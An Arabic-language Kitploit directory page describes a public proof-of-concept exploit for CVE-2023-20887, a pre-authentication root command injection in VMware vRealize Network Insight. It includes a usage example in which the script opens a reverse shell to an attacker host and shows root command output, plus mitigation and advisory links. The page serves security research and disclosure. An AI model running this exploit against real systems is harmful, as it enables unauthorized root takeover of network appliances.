Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-20887 — VMWare vRealize Network Insight ثغرة تنفيذ كود عن بُعد قبل المصادقة (CVE-2023-20887) | Kitploit
أدوات/GitHubGitHub/sinsinology/cve-2023-20887
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubsinsinology/cve-2023-20887

CVE-2023-20887

VMWare vRealize Network Insight ثغرة تنفيذ كود عن بُعد قبل المصادقة (CVE-2023-20887)

عرض المستودع
229411منذ 3 سنواتتمت المراجعة من قبل Kitploit
الموقع الإلكتروني

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-20887

POC لثغرة CVE-2023-20887 في VMWare Aria Operations for Networks (vRealize Network Insight) — تنفيذ أوامر عن بُعد (RCE) دون مصادقة

التحليل الفني

يمكن العثور على تحليل السبب الجذري للثغرة على مدونتي: https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/

poc

الملخص

VMWare Aria Operations for Networks (vRealize Network Insight) معرّضة لحقن الأوامر عند قبول مدخلات المستخدم عبر واجهة Apache Thrift RPC. تتيح هذه الثغرة لمهاجم عن بُعد غير مصادَق تنفيذ أوامر عشوائية على نظام التشغيل الأساسي بصلاحيات المستخدم root. واجهة RPC محمية بوكيل عكسي (reverse proxy) يمكن تجاوزه. قيّمت VMware خطورة هذه المشكلة ضمن نطاق حرج (Critical) بأعلى درجة أساسية في CVSSv3 تبلغ 9.8. يمكن لفاعل خبيث الحصول على تنفيذ أكواد عن بُعد في سياق صلاحيات 'root' على الجهاز. إصدارات VMWare 6.x معرّضة للثغرة.

الاستخدام

root@kitploit:~
python CVE-2023-20887.py --url https://192.168.116.100 --attacker 192.168.116.1:1337
VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE || Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
(*) Starting handler
(+) Received connection from 192.168.116.100
(+) pop thy shell! (it's ready)
sudo bash
id
uid=0(root) gid=0(root) groups=0(root)
hostname
vrni-platform-release

التخفيف

قم بالتحديث إلى أحدث إصدار أو خفّف المخاطر باتباع الإرشادات الواردة في Progress Advisory

  • https://www.vmware.com/security/advisories/VMSA-2023-0012.html

تابعونا على تويتر لآخر الأبحاث الأمنية:

  • SinSinology
  • SummoningTeam

إخلاء المسؤولية

أُنشئ هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعّالة فقط، وليس الغرض منه استخدامه لمهاجمة الأنظمة إلا في الحالات المصرّح بها صراحةً. القائمون على المشروع غير مسؤولين عن أي إساءة استخدام للبرنامج. استخدمه بمسؤولية.

تنزيل الأداة